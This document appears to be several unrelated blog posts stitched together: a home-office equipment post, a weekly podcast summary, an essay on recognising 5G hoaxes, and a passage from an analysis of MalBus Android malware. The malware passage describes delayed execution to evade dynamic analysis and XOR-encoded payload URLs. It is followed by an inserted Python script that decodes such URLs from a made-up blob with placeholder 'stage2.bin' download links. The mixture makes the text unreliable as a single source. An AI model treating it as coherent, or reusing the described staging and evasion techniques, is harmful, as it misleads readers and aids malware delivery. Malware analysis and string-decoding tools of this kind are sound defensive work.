I know many of you won’t agree with this paragraph, but in my personal point of view “less is more” (cit. Mies). The more objects populate your desk, the higher the probability of getting distracted by them. I used to have books on my desk, and every time I looked at them my mind went to that story or to what the book gave me in terms of knowledge, and… this was really distracting me. Six things are my minimal and best setup: a laptop, a mouse, a mechanical keyboard, headphones, a big monitor and my phone.

Home Setup

Talking about monitors, I would suggest a single big one. I used to have multiple monitors on my desk and it is amazing to see how many parallel tasks you can keep on them, but many parallel tasks do not necessarily mean higher productivity. In my experience it’s best to focus on 3 or 4 parallel tasks, not more. So a big screen managed by a great window manager (see the software section) helps you not to exaggerate with multiple tasks. However, if you are a developer an additional vertical screen would definitely help you consult StackOverflow, GitHub and documentation. In many other cases I personally wouldn’t suggest more than two displays. My favourite size is 27″ and I prefer a borderless monitor with an adjustable “neck”, so I can move it depending on chair position. Actually one of my favourites is the SAMSUNG SR75 4K UHD Space Monitor: it is Ultra HD, great looking and takes very little space, so you have much more room for your arms.


A mechanical keyboard is one of life’s little pleasures. If you are a writer it is definitely a “must have”, while if you are a developer or a malware analyst it’s mostly a fashion. Conversely, if you are a penetration tester or an adversarial simulator you would probably appreciate foldable keyboards more, and if you are an IT guy you would probably love small and tiny keyboards, light and easy to carry between racks in “work in progress” data centers. As with monitors, the keyboard is a humongous world where there is never a “best in class”, only what “you like most”. In my case I love Varmilo keyboards, since they allow many quite interesting customizations. Ergonomics plays a fundamental role in keyboard choice, but even the most ergonomic keyboard could harm you if you do not have a good body posture, so before getting into a very fancy ergonomic keyboard (like the most famous one HERE) try to correct your body posture.


The mouse is one of the most used artifacts you will be touching once you sit in your comfortable chair, so you need to pay the right attention to what you choose. While the Kensington trackball mouse (here) is definitely my personal suggestion, I do not use it. Since I used to travel a lot during my normal working weeks, I can’t carry it back and forth on trips: a trackball is not comfortable to move at all. So I decided to take a small but still nice mouse. If you are used to travelling a lot like me, you would probably appreciate a Bluetooth mouse, with no cables in the bag (remember: less is more). The mouse should be small in size and light. I would suggest a hard (metal) mechanical wheel with strong inertia, to give you a nice scrolling feeling. One of my favourites is definitely the Logitech MX Anywhere 2.


This would be the most important choice: it is quite easy to change a monitor or a mouse, but changing your PC would be much more challenging (and expensive). Depending on what you do on a daily basis you have many, many choices. So let's start from mobility. In my case I move a lot between my offices, and wherever I go I have external monitors, so I prefer small laptops. My principal tasks are split between malware analysis (mostly for fun) and management (mostly for work), so I need many virtual machines (mostly for fun) and many Chrome tabs (mostly for work). High performance in terms of SSD, CPU and RAM is required (virtualization and malware analysis toolsets). If you are a podcaster or a YouTuber you would need a high-performance graphics processor (especially if you post-process video); if you are a writer you would probably love to write "around the globe" (not in a small cold office), so you would love a light laptop; and if you are a developer or content designer you would probably love a MAC 😀 (just kidding). My favorite so far is the RazerBlade Stealth 13″, which has incredible performance: touchscreen monitor and retina display, plus an i7, 16GB RAM and a 500GB SSD. Generally speaking, if you are looking for a PC and not for a MAC, I would definitely suggest taking a look at one of the following tiny but powerful laptops: Dell XPS 13, HP Spectre and ASUS ZenBook.


If you are a music lover, well, you'd better skip this section. I don't use headphones for high-quality music listening but rather for conferences and calls. However, from time to time I love focusing by listening to my favorite playlist, so I had to figure out what, from my personal point of view, could be a good arrangement. My best compromise was the Jabra Move. If you don't need music (or if you have separate headphones for listening to music), having two "covered" ears (i.e. stereo) can be quite annoying, since it is not natural to talk without the right feel of your own voice (with stereo headphones your voice sounds quite muffled). On the other hand, if you want to listen to music you definitely cannot do it with a mono headset. The Jabra Move seems to have nice sound quality and a nice integrated microphone, so you can easily switch between conferences and music without changing hardware.


First of all, let me explain why I am crazy about window managers. When you get into the productivity world, having a well-configured system with personal shortcuts is not only a way to speed up the boring tasks (opening windows, resizing windows, creating multi-desktop environments, opening up the usual web pages for reading, downloading stuff and placing it in the right folder, saving bookmarks, etc.), it is actually a way to organize your entire day. Just as many patterns are available for email management (I prefer the zero-inbox pattern, even if I don't truly succeed in using it), many are available for virtual desktop management. While I used to manage virtual desktops by functionality (and this works pretty well on MAC OS systems), on my Linux box I prefer keeping virtual desktops by project. So yes, I do have many duplicated applications running, but each specialized on a specific topic. Questionable, I know... but in this way I feel much more confident, since I prefer to classify my work into projects rather than into functionalities spread over multiple virtual environments. Anyway, a great window manager would definitely help you out. I've always been fascinated by the i3 tiling window manager, but I was always skeptical about the startup phase: on one hand the time to become fluent in i3, and on the other hand the installation procedure and configuration time, were kind of killing me. But recently I met Regolith, which changed the way I think about window managers. Today I would definitely suggest you try it, at least for one week.

While a lot of to-do list software is available out there, I prefer the simple Todo.txt. It is damn simple, you can access it from multiple devices, it has a command line, it can manage priorities and... it has a command line!! (did I already mention that?). If you are a more "web oriented" guy, I would suggest Trello-CLI, but really not more than that.

One of my favorite editors is VIM. But I am not an "old school guy"; I just love the many, many plugins available for it and how you can transform it!

VIM Configuration

Once you've learned to master VIM you don't need any other editor ever: VIM is everywhere and you can customize it in a very quick way. If you like how my VIM looks, HERE is my configuration file; feel free to grab and use it if you wish.


I don't think there is a definitive setup. It will change over time depending on your needs. You might need electronic boards and soldering irons, or just a simple laptop. It really depends on what you are doing and what deliverables you are working on. In this "unusual" (at least for my corner) post I wanted to answer the many questions on the "perfect home setup" that came to me in the past three weeks. I do have my "perfect" setup, which I've shared with you, but I am sure it will change over and over again, just as it has changed a lot in the past few years. The only real suggestion I'd like to make is: "Less is More". The fewer things you hold on your desk, the fewer distraction points you will have and the faster your deliverable will be.

Have fun and #StayAtHome

Weekly Update 186


Somehow this week's update ended up being 55 minutes, largely because of playing with a bunch of the new network gear and unboxing a pretty snazzy looking rack from 4Cabling. I get through with that then sit by the pool for the rest of this week's update. (And yes, I shaved!)

Incidentally, there's some audio clipping occurring after I sit by the pool. I've tweaked the levels a bit at that point to try and compensate, still not quite sure what happened but hopefully it's not too bad.



  1. We built a Nerf Gun wall! (this was just super good fun, it's now all hooked up to Alexa too)
  2. Pwned Passwords is getting bigger and bigger (more than half a billion queries in a month now)
  3. I hate spam and I hate being asked to link to spammy articles (but I love the outcome of this blog post!)
  4. The 5G health concern situation is an exercise in understanding hoaxes and disinformation campaigns (plus, some of it's just absolutely batshit crazy)
  5. Sponsored by Duo: Going beyond the perimeter: what a 'zero-trust' approach to security means and how to get started. Download the guide by Duo Security.

Let’s Stop the 5G Hysteria: Understanding Hoaxes and Disinformation Campaigns


Hey, did you hear that Facebook are going to start using your personal photos in whatever way they see fit? For real, it's going to start tomorrow unless you act quickly! All you have to do is copy and paste this message onto your own Facebook page and wammo - they're not allowed to touch them! Ready? Here goes: "With this statement, I give notice to Facebook it is strictly forbidden to disclose, copy, distribute, or take any other action against me based on this profile and/or its contents..."

This sounds ridiculous. It is ridiculous yet somehow, otherwise smart people in my own social networks (and probably yours) lapped it up. Copying and pasting this message achieved absolutely nothing beyond shining a spotlight on those who were prone to falling for hoaxes and disinformation campaigns. I've been following and writing about these for long enough that they're dead obvious to spot these days, for example:

And so it is with posts about the dangers of 5G. I've seen a massive uptick of people sharing information about the emerging cellular standard over the last week or so, enough that it prompted me to ask what's going on via Twitter:

By all means, read through the responses if you want to get a sense of how people responded, but let's avoid the discussion of "does 5G present a danger to our health" and instead talk about how to identify false or misleading information spread by social media. If we spoke about the former, we'd be here all day and others are much more qualified to do it than me. The latter, however, is right up my alley and understanding the hallmarks is valuable well beyond just the current 5G discussion.

So, let's not talk about whether 5G is safe or not, let's instead talk about why opponents of the technology display every single spammy, scammy, hoaxy behaviour imaginable and then you can consider how much you should trust them. I'll break this down into logical headings everyone can easily follow and call out key insights in bold.

It Takes Minutes to Establish (Lack of) Credibility

Let's take a perfect example of disinformation and how easy it is to establish the credibility of what's being shared. I had this pop up a couple of weeks ago:

Sounds ridiculous, but also sounds like the sort of thing non-techie people might fall for. I don't personally know the lady who posted it; she's the mum of a kid in my son's class and AFAIK, not a malware analyst (or anything close) and is unlikely to have an informed opinion on the matter. So let's just Google it:


Well that was easy. I replied to the lady's message with a link to the hoax within about 60 seconds yet still, other parents chimed in and thanked her.

Let's try the same thing with one of the 5G petitions that's been circulating. This one is titled Stop 5G Networks Now! We do not want a weapons system, nor our brains to be fried!:


The first warning sign on this petition is literally the warning at the top of the page: has received flags from our users that the statements in this petition may be contested. You should consider researching this issue before signing or sharing.

You'll see the same warning on the Ban the 5g network in Australia petition and the Stop the 5G roll out / Turn off 5G Australia petition. I've seen both these petitions shared in recent days and I'm near certain that none of the people sharing them have "researched this issue before signing or sharing".

Edit: The day after posting this, 2 of the 3 petitions linked to above had been removed by for being "against their community guidelines".

This was started by Jenn Oates so let's dig a little deeper and see what sort of credentials she has given she's talking about the health implications of radio waves. Here's her profile:


That is all. No bio, but there's still useful information here. The profile pic, for one, is easily searched on Google images and returns a constant theme:


Crop circles, eh? We'll just park this as a data point frequently related to conspiracy theories and move on. Let's try a Google search for Jenn Oates Parkerville, WA, Australia. The first result is another page with a petition update from Jenn. This is the only content of substance on the page:


Whoa - "evil Devil worshipping money counting Judas Satanist". So here's another insight:

Insight 1: You can tell a lot about the credibility of a claim by observing those attracted to it.

While we're on petition updates, have a scroll down the page and the last one at the time of writing embeds a YouTube video titled 5G PROGRAMMED to KILL ALL LIFE which was posted by a user called wil paranormal:


No mention of 5G, but clearly a conspiracy theorist. And again, the insight from above - what does it tell you about a topic when you look at those supporting it?

It took several minutes after looking at Jenn's petition to find the information above and also find a complete lack of information on Jenn herself; no scientific papers, no peer-reviewed content or anything else of any kind you'd expect someone mounting scientific arguments to have produced.

You can play the same easy game with every one of the petitions mentioned above. For example, the "Stop the 5G roll out / Turn off 5G Australia" was started by a "Mumma, Photographer, Glamour/Promotional Model" in Bundaberg, a place better known for making rum than producing scientific research:


The "Ban the 5g network in Australia" petition was started by a vegan Instagram star, so far the only person who actually contributes to the wellness industry but a world away from scientists who study the effects of radio waves on the human body.

All of the people above are, of course, entitled to their own opinions, but the question you need to ask yourself is contained within the next insight:

Insight 2: Understand the difference between people who have formed their own opinion versus those who are qualified enough to influence your opinion.

One last example just to drive the point home:

I enjoyed Zombieland, but not once did I stop and think "here's a guy who looks like he'd know a thing or two about voltage-gated calcium channel activation exacerbating viral replication". Yet here he is, broadcasting it to 2M Instagram followers. Fortunately, he's since deleted the post.

Understand Your Own Susceptibility to Confirmation Bias

Let's start by understanding the term confirmation bias:

Confirmation bias is the tendency to search for, interpret, favour, and recall information in a way that confirms or strengthens one's prior personal beliefs or hypotheses. It is a type of cognitive bias. People display this bias when they gather or remember information selectively, or when they interpret it in a biased way. The effect is stronger for desired outcomes, for emotionally charged issues, and for deeply-entrenched beliefs.

As it relates to the 5G topic, what I'm consistently seeing is people who want to believe that governments or big tech are suppressing the little guy and willingly believe that resources confirming this view are trustworthy. The problem with confirmation bias is that if you search hard enough, you'll always find material that supports your point of view.

There's a sensational documentary about flat earthers (ok, sensationally entertaining!) I watched on Netflix recently called Behind the Curve. If you've not seen it already, take a moment to watch the trailer:

Note the quote at about the one-minute mark:

I want to believe "this", this doesn't mesh with reality so don't change my view, change reality!

It's the antithesis to scientific research; instead of setting out to determine the conclusion in an evidence-based fashion, people set out with the conclusion they want to believe already cemented in their minds then find the evidence they need in order to support that conclusion.

Insight 3: Consider whether you believe a claim because the evidence supports it, or simply because you want to believe it.

We are all susceptible to confirmation bias, and that includes me. There are things I dearly want to believe and when I see a headline that supports my bias, I'm naturally inclined to latch onto it. The question for you when reading about a topic such as 5G is whether you want to believe that it's dangerous, or whether you want to research it properly and will be satisfied with whatever conclusion the evidence draws you to. That's the key differentiation, and that's what most people I see sharing the conspiracy theories simply aren't doing.

Occam's Razor (Usually) Provides the Answer

A (non-tech) mate asked me about 5G the other day. He'd read news of it being linked to Coronavirus, a conspiracy theory that has gained a surprising amount of momentum in recent weeks. (Sidenote: Wired has a piece titled How the 5G coronavirus conspiracy theory tore through the internet which explains the origins of this.) It doesn't take much searching to find precisely the sort of correlation conspiracies he's talking about:

So we had a discussion about how correlation does not imply causation and how tweets such as the one above show absolutely zero evidence of a cause and effect relationship between 5G and Coronavirus. If that all sounds a bit wordy for you, the following tweet illustrates it beautifully:

So, what's to be done? Do we ban Nicolas Cage movies to prevent drowning? No, because that's a patently ridiculous assertion and we can easily reach that conclusion by applying Occam's Razor:

The simplest solution is most likely the right one.

Applied to 5G and Coronavirus, Occam's Razor would conclude that a densely populated city with 11M people will likely spread a highly contagious virus quite quickly. Also, a large city in China (which is rapidly becoming the tech hub of the world) is likely to be an early adopter of next gen tech. These are both logical, rational and unrelated conclusions.

Insight 4: When faced with alternative theories, consider which one is the simplest and therefore most likely to be true.

Let's apply Occam's Razor to another accusation being made in the 5G debate space: that big tech is censoring discussion on the topic. My mate brought this up in our discussion: "Google shouldn't be censoring free speech by removing YouTube videos, that should be our right". Alrighty then, let's play that thought out - should Google allow extremist videos that incite violence? No, of course not, because that actually has the potential to cause serious harm. How is that related to 5G hoaxes? Convinced of the role 5G plays in the spread of coronavirus, people are literally destroying 5G towers in the UK:

It's just insane, and it's spurred on by batshit crazy videos like this:

One video, removed by the site after the Guardian flagged it, featured a man claiming to be a former executive at a UK mobile network falsely stating that coronavirus tests were actually used to spread the virus, and that the pandemic was created to hide deaths from the mobile technology.

So, applying Occam's Razor, are videos being removed because big tech is trying to silence "the little guy" blowing the whistle on a corrupt industry that is deliberately spreading a deadly virus to cover up 5G radiation deaths, or are they being removed because they incite dickheads to destroy critical infrastructure? There's only one simple answer...

The "Viral" Nature of Hoaxes is a Warning Sign

Let's go back to the Dance of the Pope hoax for a moment, the one that was circulated by a parent in WhatsApp. Literally whilst writing this blog post yesterday, the following came in via Facebook Messenger from a friend of my parents in a totally different social circle:


The last sentence is the warning sign - "Fwd this msg to as many as you can!" - and you see it over and over again in hoaxes and disinformation campaigns. You'll also see it over and over again as it relates to the 5G debate:

It's very likely Helen doesn't have an informed view on the 5G situation and that it's appealing to her confirmation bias (I'm drawing that conclusion based on her other tweets), yet she's appealing to thousands of followers to reinforce her own view of 5G. When Bal watched the video of a former Vodafone employee drawing links between 5G and coronavirus it "connected a lot of dots" for him (which again, is obviously just appealing to his own confirmation bias), and he encouraged others to watch it and draw the same conclusion. This is the viral nature of social media - one person's enthusiasm or endorsement rapidly spreads to others and it's just so easy to replicate a message without giving any thought to the topic nor the consequences that "going viral" can have.

Going back to the Dance of the Pope, I asked the sender of the hoax what made her believe it was real and now that she knows it's a hoax, how she feels about it:


This sentence nails it, both as it relates to the hoax video and much of the 5G debate that's currently raging:

In my case (& I think with many others), when you know that you lack knowledge & experience in this field, & that you don’t know enough to call it ‘most definitely’ a scam, (& that you feel it’s arrogant to make a choice on other people’s behalf) you err on side of caution & post it on

You know you lack knowledge but you post it on anyway. Now here we are with a dancing pope and 5G spreading coronavirus.

Insight 5: Question why you're being encouraged to influence others and if you're sufficiently informed to do so.


The problem with the 5G situation specifically is that if there are valid concerns to be had, they're buried in there somewhere amongst all the crazy. And let's face it, there's a whole spectrum of legitimacy in this discussion, the challenge is sifting through it, discarding the rubbish and focusing on the good stuff. And that's really the point of this post: being able to identify when information is hyperbolic and likely to be either misleading or outright false versus something we genuinely need to take seriously.

If I was to be concerned about 5G (which I'm not) and I wanted to learn more (which at this stage, I don't), I'd go straight to a technology resource I trusted. Many people pointed me at Wired's coverage in December so if you want to learn more, start there. I'd also defer to the likes of the World Health Organisation:

I wouldn't go to Jenn in Parkerville because without evidence to contrary, I can only assume she has absolutely no idea what she's talking about. I also wouldn't share any information on the topic unless I felt informed enough to influence others. I do feel informed enough to share an opinion on hoaxes and disinformation campaigns, so here we all are.

If I've appealed to your own confirmation bias by highlighting nut jobs talking about 5G conspiracy theories, please share this post with your entire social network.

MalBus Actor Changed Market from Google Play to ONE Store

The McAfee Mobile Research team has found another variant of MalBus in an education application developed by a South Korean developer. In the previous MalBus case, the author distributed the malware through Google Play, but the new variants are distributed via the ONE Store in much the same way. ONE Store is a joint venture of the country's three major telecom companies and is a preinstalled app on most Android phones sold in South Korea. It has 35 million users (close to 70% of South Korea's population) and had already surpassed Apple's app store sales by the end of 2018.

The application in question is distributed via Google Play and the ONE Store at the same time. The malicious application downloads and runs an encrypted payload with malicious functions.

McAfee Mobile Security detects this threat as Android/Malbus and alerts mobile users if it is present, while protecting them from any data loss.

Figure 1. Screen capture from the application page on the ONE Store

The Campaign

We found malicious code injected by an attacker, via the developer's account, into versions 27 and 28 of the application distributed through the ONE Store. The App Signature Certificate for versions 26 through 29 distributed from the ONE Store is the same. No other application developed by the same author was found on the ONE Store. The ONE Store is now serving version 29, which does not contain malicious code. Google Play still offers version 26, which is also clear of infection.

Figure 2. Infected version history of the application

The overall flow of this application, focusing on the malicious function, is explained below:

Figure 3. Overview of malicious behavior

After the malware is installed, the malicious code has a latent period of 10 hours to avoid being discovered by dynamic analysis.

Figure 4. Using LastUpdateTime to check latent period

After the latent period, it starts two threads. The first one loads native library “” and calls one of its exported functions, “playMovie”, with a phone number as an argument while the second one creates a Java server socket for communication with another native library.

Figure 5. The malicious native library embedded in the APK

The first loaded library, , contains a curl binary and the URLs of the secondary payloads as XOR-encoded data that is decoded at runtime. The XOR value is 0x8E and it is used throughout this library. All the decoded URLs appear to point to compromised (hacked) sites, and they serve RC4-encrypted ELF files.
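An added example (not McAfee's code) of how an analyst can recover such XOR-obfuscated URLs from a library's data: it scans a byte blob with the key named above, 0x8E, and more generally tries every single-byte key, using the known plaintext prefix "http" to pick out real hits. The blob, the domains and all function names below are constructed for this example.

```python
"""Recover single-byte-XOR-obfuscated URLs from a native library's data.

Added example, not McAfee's code. MalBus keeps its payload URLs XOR-encoded
with 0x8E; this scanner decodes a raw byte blob with that key, and can also
try every key, keeping only decoded runs that contain a URL. The sample blob
below is constructed here with placeholder domains purely to exercise the code.
"""
import re
import string

# Printable ASCII without the whitespace control characters.
PRINTABLE = set(bytes(string.printable, "ascii")) - set(b"\t\n\r\x0b\x0c")
MIN_RUN = 8                     # shortest decoded run worth inspecting
KEY_FROM_REPORT = 0x8E          # the XOR value named in the analysis above

URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def printable_runs(data: bytes, min_len: int = MIN_RUN):
    """Yield (offset, text) for each run of printable ASCII >= min_len bytes."""
    start = None
    for i, b in enumerate(data):
        if b in PRINTABLE:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                yield start, data[start:i].decode("ascii")
            start = None
    if start is not None and len(data) - start >= min_len:
        yield start, data[start:].decode("ascii")


def find_xor_urls(blob: bytes, keys=range(256)):
    """Return [(key, offset, url)] for every URL that appears after XOR-decoding
    blob with one of `keys`. Key 0 reports URLs stored in the clear, so an
    analyst sees both obfuscated and plain strings in one pass."""
    hits = []
    for key in keys:
        decoded = xor_bytes(blob, key)
        for off, text in printable_runs(decoded):
            for m in URL_RE.finditer(text):
                hits.append((key, off + m.start(), m.group(0)))
    return hits


# Constructed sample blob: fake header bytes, two URLs encoded with 0x8E
# (NUL-terminated as in C string tables), junk, and one plain exported name.
SAMPLE_BLOB = (
    b"\x7fELF\x00\x00\x00\x01" + bytes(range(0x90, 0xA0))
    + xor_bytes(b"http://compromised-site.example/stage2.bin\x00", KEY_FROM_REPORT)
    + b"\xff\x01\x02\x03"
    + xor_bytes(b"https://another.example/p/drop.dat\x00", KEY_FROM_REPORT)
    + b"playMovie\x00"
)


if __name__ == "__main__":
    # Known key first (what the analysis above used), then a blind scan.
    for key, off, url in find_xor_urls(SAMPLE_BLOB, keys=[KEY_FROM_REPORT]):
        print(f"key=0x{key:02x} offset=0x{off:04x} {url}")
    print("blind scan found", len(find_xor_urls(SAMPLE_BLOB)), "URL(s)")
```

On a real sample you would feed the library's data section (e.g. carved from the APK's lib/ directory) into `find_xor_urls` and hand the resulting URLs to your blocklist or takedown process.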